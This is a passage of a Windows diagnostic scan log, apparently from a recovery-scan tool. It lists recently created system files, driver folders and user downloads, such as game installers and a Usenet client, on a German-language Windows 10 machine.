2016-09-27 13:02 - 2016-09-27 13:02 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msdxm.ocx
2016-09-27 13:02 - 2016-09-27 13:02 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxmasf.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhoneutilRes.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneutilRes.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneServiceRes.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml6r.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 17187840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 13867520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 07792640 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 07654912 _____ (Microsoft Corporation) C:\WINDOWS\system32\mos.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 06109184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mos.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 05376000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 04557824 _____ (Microsoft) C:\WINDOWS\SysWOW64\dbgeng.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 03435008 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapRouter.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 03116544 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSAJApi.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 02947072 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapGeocoder.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 02913104 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 02820096 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 02423296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSAJApi.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 02289664 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 02166232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 02107392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapGeocoder.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 02083840 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceFlows.DataModel.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 01993216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 01755136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DeviceFlows.DataModel.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 01631232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Resources.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 01631232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 01508864 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2016-09-27 13:01 - 2016-09-27 13:01 - 01461200 _____ (Microsoft Corporation) C:\WINDOWS\system32\user32.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 01456640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 01435896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user32.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 01062912 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 01060352 _____ (Microsoft Corporation) C:\WINDOWS\system32\JpMapControl.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 01029632 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsStore.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 01006080 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3D12.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00936448 _____ (Microsoft Corporation) C:\WINDOWS\system32\NMAA.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00932864 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00905216 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapControlCore.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00860672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00838144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\JpMapControl.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00820736 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingOnlineServices.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00806912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3D12.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00773200 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00761344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NMAA.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00755200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00715264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapControlCore.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00681304 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ClipSp.sys
2016-09-27 13:01 - 2016-09-27 13:01 - 00619368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2016-09-27 13:01 - 2016-09-27 13:01 - 00601200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00584544 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe
2016-09-27 13:01 - 2016-09-27 13:01 - 00575488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\qdvd.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00536576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingOnlineServices.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00526848 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneDriveSettingSyncProvider.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00509792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncHost.exe
2016-09-27 13:01 - 2016-09-27 13:01 - 00476672 _____ (Microsoft Corporation) C:\WINDOWS\system32\schannel.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00461312 _____ (Microsoft) C:\WINDOWS\SysWOW64\DbgModel.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00446464 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapConfiguration.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00426496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneDriveSettingSyncProvider.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00410624 _____ (Microsoft Corporation) C:\WINDOWS\system32\facecredentialprovider.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00409088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MosResource.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00409088 _____ (Microsoft Corporation) C:\WINDOWS\system32\MosResource.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00389632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\schannel.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00389000 _____ (Microsoft Corporation) C:\WINDOWS\system32\wevtapi.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00380928 _____ (Microsoft Corporation) C:\WINDOWS\system32\wincorlib.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00366592 _____ (Microsoft Corporation) C:\WINDOWS\system32\NmaDirect.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00331264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapConfiguration.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00327680 _____ (Microsoft Corporation) C:\WINDOWS\system32\container.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00327168 _____ (Microsoft Corporation) C:\WINDOWS\system32\eapp3hst.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00313856 _____ (Microsoft Corporation) C:\WINDOWS\system32\moshostcore.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00302592 _____ (Microsoft Corporation) C:\WINDOWS\system32\eapphost.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00297552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wevtapi.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00288768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wincorlib.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00243200 _____ (Microsoft Corporation) C:\WINDOWS\system32\eappcfg.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00227840 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdd.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00226304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\container.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00225280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\C_G18030.DLL
2016-09-27 13:01 - 2016-09-27 13:01 - 00210944 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
2016-09-27 13:01 - 2016-09-27 13:01 - 00200704 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipboardServer.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00187232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys
2016-09-27 13:01 - 2016-09-27 13:01 - 00178528 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostUser.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00168800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecpkg.sys
2016-09-27 13:01 - 2016-09-27 13:01 - 00156672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidclass.sys
2016-09-27 13:01 - 2016-09-27 13:01 - 00150528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32k.sys
2016-09-27 13:01 - 2016-09-27 13:01 - 00150528 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsBtSvc.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00136032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostUser.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00123904 _____ (Microsoft Corporation) C:\WINDOWS\system32\samlib.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00118112 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\EhStorTcgDrv.sys
2016-09-27 13:01 - 2016-09-27 13:01 - 00116224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapsBtSvc.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00114688 _____ (Microsoft Corporation) C:\WINDOWS\system32\offlinelsa.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00114192 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32u.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00110080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Microsoft-Windows-MapControls.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00110080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft-Windows-MapControls.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00105984 _____ (Microsoft Corporation) C:\WINDOWS\system32\eappgnui.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00102400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\offlinelsa.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00095232 _____ (Microsoft Corporation) C:\WINDOWS\system32\tzautoupdate.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00095232 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsCSP.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00088064 _____ (Microsoft Corporation) C:\WINDOWS\system32\MosStorage.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00086016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\samlib.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00079536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32u.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00078848 _____ (Microsoft Corporation) C:\WINDOWS\system32\MosHostClient.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00077312 _____ (Microsoft Corporation) C:\WINDOWS\system32\moshost.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00074240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\updatepolicy.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00073568 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hvservice.sys
2016-09-27 13:01 - 2016-09-27 13:01 - 00071168 _____ (Microsoft Corporation) C:\WINDOWS\system32\eappprxy.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00070656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MosStorage.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00058880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MosHostClient.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00049152 _____ (Microsoft Corporation) C:\WINDOWS\system32\mapstoasttask.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00043520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\xinputhid.sys
2016-09-27 13:01 - 2016-09-27 13:01 - 00040960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidparse.sys
2016-09-27 13:01 - 2016-09-27 13:01 - 00040448 _____ (Microsoft Corporation) C:\WINDOWS\system32\mapsupdatetask.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00038400 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidusb.sys
2016-09-27 13:01 - 2016-09-27 13:01 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\deviceassociation.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\delegatorprovider.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\system32\storagewmi_passthru.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\system32\nativemap.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00022528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\encapi.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\delegatorprovider.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00020480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\storagewmi_passthru.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00020320 _____ (Microsoft Corporation) C:\WINDOWS\system32\kdhvcom.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsBtSvcProxy.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00014336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\C_IS2022.DLL
2016-09-27 13:01 - 2016-09-27 13:01 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\c_GSM7.DLL
2016-09-27 13:01 - 2016-09-27 13:01 - 00009728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Microsoft-Windows-MosTrace.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00009728 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft-Windows-MosTrace.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00009216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Microsoft-Windows-MosHost.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00009216 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft-Windows-MosHost.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tzres.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml6r.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapControlStringsRes.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\tzres.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapControlStringsRes.dll
2016-09-27 12:57 - 2016-09-27 12:57 - 00008192 _____ C:\WINDOWS\system32\config\userdiff
2016-09-27 12:56 - 2016-09-27 12:56 - 00000000 ____D C:\WINDOWS\SysWOW64\XPSViewer
2016-09-27 12:56 - 2016-09-27 12:56 - 00000000 ____D C:\Program Files\Reference Assemblies
2016-09-27 12:56 - 2016-09-27 12:56 - 00000000 ____D C:\Program Files\MSBuild
2016-09-27 12:56 - 2016-09-27 12:56 - 00000000 ____D C:\Program Files (x86)\Reference Assemblies
2016-09-27 12:56 - 2016-09-27 12:56 - 00000000 ____D C:\Program Files (x86)\MSBuild
2016-09-27 12:55 - 2016-09-27 12:55 - 00199008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wof.sys
2016-09-27 12:55 - 2016-05-25 15:31 - 01166520 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationNative_v0300.dll
2016-09-27 12:55 - 2016-05-25 15:31 - 00124624 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationCFFRasterizerNative_v0300.dll
2016-09-27 12:55 - 2016-05-25 15:31 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\system32\TsWpfWrp.exe
2016-09-27 12:55 - 2016-05-25 12:03 - 00778936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationNative_v0300.dll
2016-09-27 12:55 - 2016-05-25 12:03 - 00103120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
2016-09-27 12:55 - 2016-05-25 12:03 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TsWpfWrp.exe
2016-09-27 12:24 - 2016-09-27 12:24 - 00000000 _SHDL C:\Users\Default\Vorlagen
2016-09-27 12:24 - 2016-09-27 12:24 - 00000000 _SHDL C:\Users\Default\Startmenü
2016-09-27 12:24 - 2016-09-27 12:24 - 00000000 _SHDL C:\Users\Default\Netzwerkumgebung
2016-09-27 12:24 - 2016-09-27 12:24 - 00000000 _SHDL C:\Users\Default\Lokale Einstellungen
2016-09-27 12:24 - 2016-09-27 12:24 - 00000000 _SHDL C:\Users\Default\Eigene Dateien
2016-09-27 12:24 - 2016-09-27 12:24 - 00000000 _SHDL C:\Users\Default\Druckumgebung
2016-09-27 12:24 - 2016-09-27 12:24 - 00000000 _SHDL C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2016-09-27 12:24 - 2016-09-27 12:24 - 00000000 _SHDL C:\Users\Default\AppData\Local\Verlauf
2016-09-27 12:24 - 2016-09-27 12:24 - 00000000 _SHDL C:\Users\Default\AppData\Local\Anwendungsdaten
2016-09-27 12:24 - 2016-09-27 12:24 - 00000000 _SHDL C:\Users\Default\Anwendungsdaten
2016-09-27 12:24 - 2016-09-27 12:24 - 00000000 _SHDL C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2016-09-27 12:24 - 2016-09-27 12:24 - 00000000 _SHDL C:\Users\Default User\AppData\Local\Verlauf
2016-09-27 12:24 - 2016-09-27 12:24 - 00000000 _SHDL C:\Users\Default User\AppData\Local\Anwendungsdaten
2016-09-27 12:24 - 2016-09-27 12:24 - 00000000 ____D C:\ProgramData\USOShared
2016-09-27 12:22 - 2016-09-27 12:23 - 00007623 _____ C:\WINDOWS\diagwrn.xml
2016-09-27 12:22 - 2016-09-27 12:23 - 00007623 _____ C:\WINDOWS\diagerr.xml
2016-09-27 12:21 - 2016-10-18 12:36 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-09-27 12:21 - 2016-09-27 12:22 - 00002824 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task
2016-09-27 12:18 - 2016-09-27 12:18 - 00022960 _____ C:\WINDOWS\system32\emptyregdb.dat
2016-09-27 12:14 - 2016-09-27 12:14 - 00001576 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2016-09-27 12:13 - 2016-09-27 12:14 - 00000000 ____D C:\WINDOWS\system32\config\bbimigrate
2016-09-27 12:11 - 2016-10-17 13:13 - 00000000 ____D C:\Users\maikp
2016-09-27 12:11 - 2016-09-27 12:11 - 00000000 _SHDL C:\Users\maikp\Vorlagen
2016-09-27 12:11 - 2016-09-27 12:11 - 00000000 _SHDL C:\Users\maikp\Startmenü
2016-09-27 12:11 - 2016-09-27 12:11 - 00000000 _SHDL C:\Users\maikp\Netzwerkumgebung
2016-09-27 12:11 - 2016-09-27 12:11 - 00000000 _SHDL C:\Users\maikp\Lokale Einstellungen
2016-09-27 12:11 - 2016-09-27 12:11 - 00000000 _SHDL C:\Users\maikp\Eigene Dateien
2016-09-27 12:11 - 2016-09-27 12:11 - 00000000 _SHDL C:\Users\maikp\Druckumgebung
2016-09-27 12:11 - 2016-09-27 12:11 - 00000000 _SHDL C:\Users\maikp\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2016-09-27 12:11 - 2016-09-27 12:11 - 00000000 _SHDL C:\Users\maikp\AppData\Local\Verlauf
2016-09-27 12:11 - 2016-09-27 12:11 - 00000000 _SHDL C:\Users\maikp\AppData\Local\Anwendungsdaten
2016-09-27 12:11 - 2016-09-27 12:11 - 00000000 _SHDL C:\Users\maikp\Anwendungsdaten
2016-09-27 12:09 - 2016-09-27 12:09 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Catalyst Control Center
2016-09-27 12:09 - 2016-09-27 12:09 - 00000000 ____D C:\ProgramData\AMD
2016-09-27 12:09 - 2016-09-27 12:09 - 00000000 ____D C:\Program Files\ATI Technologies
2016-09-27 12:09 - 2016-07-16 13:41 - 02716672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2016-09-27 12:08 - 2016-09-27 12:09 - 00000000 ____D C:\Program Files (x86)\ATI Technologies
2016-09-27 12:08 - 2016-09-27 12:08 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_WpdFs_01_11_00.Wdf
2016-09-27 12:08 - 2016-09-27 12:08 - 00000000 ____D C:\Program Files\Common Files\ATI Technologies
2016-09-27 12:08 - 2016-09-27 12:08 - 00000000 ____D C:\Program Files\AMD
2016-09-27 12:08 - 2016-09-27 12:08 - 00000000 _____ C:\WINDOWS\ativpsrm.bin
2016-09-27 12:06 - 2016-10-18 12:35 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2016-09-27 12:06 - 2016-09-27 12:15 - 00194296 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-09-27 12:06 - 2016-09-27 12:06 - 00000000 ____D C:\WINDOWS\ServiceProfiles
2016-09-23 18:29 - 2016-10-14 17:56 - 00000000 ____D C:\Program Files (x86)\Funfair Machines
2016-09-23 18:28 - 2016-09-23 18:28 - 102292196 _____ () C:\Users\maikp\Downloads\Funfair-Machines-Break-Dance-No.1-V1.1-Setup.exe
2016-09-22 06:53 - 2016-09-22 06:53 - 00040555 _____ C:\Users\maikp\OneDrive\Documents\mewtwo.pdf
2016-09-21 17:50 - 2016-09-21 17:50 - 01233928 _____ (Nod ) C:\Users\maikp\Downloads\FlashPlayerPro.exe
2016-09-21 06:51 - 2016-09-27 12:14 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Usenet.nl
2016-09-21 06:51 - 2016-09-21 15:21 - 00000000 ____D C:\Users\maikp\AppData\Roaming\Usenet.nl
2016-09-21 06:51 - 2016-09-21 15:19 - 00000000 ____D C:\Users\maikp\OneDrive\Documents\Usenet.nl
2016-09-21 06:51 - 2016-09-21 06:51 - 00000000 ____D C:\Program Files (x86)\Usenet.nl
2016-09-21 06:50 - 2016-09-21 06:51 - 07457256 _____ ( ) C:\Users\maikp\Downloads\UsenetNLSetup_428537f.exe
2016-09-20 17:57 - 2016-09-20 17:57 - 00000000 ____D C:\Users\maikp\AppData\Roaming\Skype
2016-09-18 09:38 - 2016-09-18 09:41 - 00000000 ____D C:\Users\maikp\AppData\Roaming\.minecraft
2016-09-18 09:38 - 2016-09-18 09:38 - 00000000 ____D C:\Users\maikp\AppData\Roaming\java
2016-09-18 09:37 - 2016-09-18 09:37 - 02314240 _____ C:\Users\maikp\Downloads\MinecraftInstaller.msi
2016-09-18 08:50 - 2016-09-18 09:12 - 209715200 _____ C:\Users\maikp\Downloads\ZRJHBDFSWDEWE.part02.rar
2016-09-18 08:15 - 2016-09-18 09:07 - 209715200 _____ C:\Users\maikp\Downloads\ZRJHBDFSWDEWE.part01.rar
2016-09-18 08:11 - 2016-07-27 21:25 - 00504488 ____N (Microsoft Corporation) C:\WINDOWS\system32\MpSigStub.exe
2016-09-18 08:10 - 2016-09-18 08:11 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-09-18 08:09 - 2016-09-18 08:10 - 144199024 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-09-18 08:08 - 2016-09-18 08:08 - 00000000 ____D C:\Users\maikp\AppData\Roaming\Macromedia
2016-09-18 08:03 - 2016-10-07 20:57 - 00000120 ____R C:\Users\maikp\OneDrive\Documents\Eigenes Notizbuch.url
2016-09-18 08:03 - 2016-09-18 08:06 - 00000000 ____D C:\Users\maikp\OneDrive\Documents\MEGAsync Downloads
2016-09-18 08:03 - 2016-09-18 08:03 - 00000000 ____D C:\Users\maikp\OneDrive\Documents\steuer
2016-09-18 08:03 - 2016-09-18 08:03 - 00000000 ____D C:\Users\maikp\OneDrive\Documents\RCT3
2016-09-18 08:03 - 2016-09-18 08:03 - 00000000 ____D C:\Users\maikp\OneDrive\Documents\Mobizen
2016-09-18 08:03 - 2016-09-18 08:03 - 00000000 ____D C:\Users\maikp\OneDrive\Documents\MEGAsync
2016-09-18 08:03 - 2016-09-18 08:03 - 00000000 ____D C:\Users\maikp\OneDrive\Documents\Camtasia Studio
2016-09-18 08:02 - 2016-09-18 08:04 - 00000000 ____D C:\Users\maikp\AppData\Local\MicrosoftEdge
2016-09-18 05:52 - 2016-09-18 05:52 - 00000000 _SHDL C:\Users\Default.migrated\Vorlagen
2016-09-18 05:52 - 2016-09-18 05:52 - 00000000 _SHDL C:\Users\Default.migrated\Startmenü
2016-09-18 05:52 - 2016-09-18 05:52 - 00000000 _SHDL C:\Users\Default.migrated\Netzwerkumgebung
2016-09-18 05:52 - 2016-09-18 05:52 - 00000000 _SHDL C:\Users\Default.migrated\Lokale Einstellungen
2016-09-18 05:52 - 2016-09-18 05:52 - 00000000 _SHDL C:\Users\Default.migrated\Eigene Dateien
2016-09-18 05:52 - 2016-09-18 05:52 - 00000000 _SHDL C:\Users\Default.migrated\Druckumgebung
2016-09-18 05:52 - 2016-09-18 05:52 - 00000000 _SHDL C:\Users\Default.migrated\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2016-09-18 05:52 - 2016-09-18 05:52 - 00000000 _SHDL C:\Users\Default.migrated\AppData\Local\Verlauf
2016-09-18 05:52 - 2016-09-18 05:52 - 00000000 _SHDL C:\Users\Default.migrated\AppData\Local\Anwendungsdaten
2016-09-18 05:52 - 2016-09-18 05:52 - 00000000 _SHDL C:\Users\Default.migrated\Anwendungsdaten
2016-09-18 05:52 - 2016-09-18 05:52 - 00000000 _SHDL C:\Programme
2016-09-18 05:52 - 2016-09-18 05:52 - 00000000 _SHDL C:\ProgramData\Vorlagen
2016-09-18 05:52 - 2016-09-18 05:52 - 00000000 _SHDL C:\ProgramData\Startmenü
2016-09-18 05:52 - 2016-09-18 05:52 - 00000000 _SHDL C:\ProgramData\Microsoft\Windows\Start Menu\Programme
2016-09-18 05:52 - 2016-09-18 05:52 - 00000000 _SHDL C:\ProgramData\Dokumente
2016-09-18 05:52 - 2016-09-18 05:52 - 00000000 _SHDL C:\ProgramData\Anwendungsdaten
